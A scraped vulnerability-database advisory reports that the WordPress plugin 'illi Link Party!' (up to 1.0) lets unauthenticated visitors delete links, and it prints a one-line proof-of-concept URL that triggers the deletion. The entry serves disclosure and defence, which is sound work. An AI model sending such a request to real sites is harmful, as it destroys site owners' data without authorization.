Lucene search

K
wpvulndbBob MatyasWPVDB-ID:797692CE-F355-4D4A-AF01-4BD9ABC60A34
HistoryJan 23, 2024 - 12:00 a.m.

illi Link Party! <= 1.0 - Unauthenticated Arbitrary Link Deletion

2024-01-2300:00:00
Bob Matyas
wpscan.com
7
access controls
unauthenticated
deletion
poc
vulnerability
illi link party

9.4 High

AI Score

Confidence

High

Description The plugin lacks proper access controls, allowing unauthenticated visitors to delete links.

PoC

http://example.com/?page=illi3/includes/functions.php&amp;action;=delete_submission&amp;id;=INSERT_ID Replace β€œINSERT_ID” with an ID of a link and hit enter. The link will be deleted.

9.4 High

AI Score

Confidence

High

Related for WPVDB-ID:797692CE-F355-4D4A-AF01-4BD9ABC60A34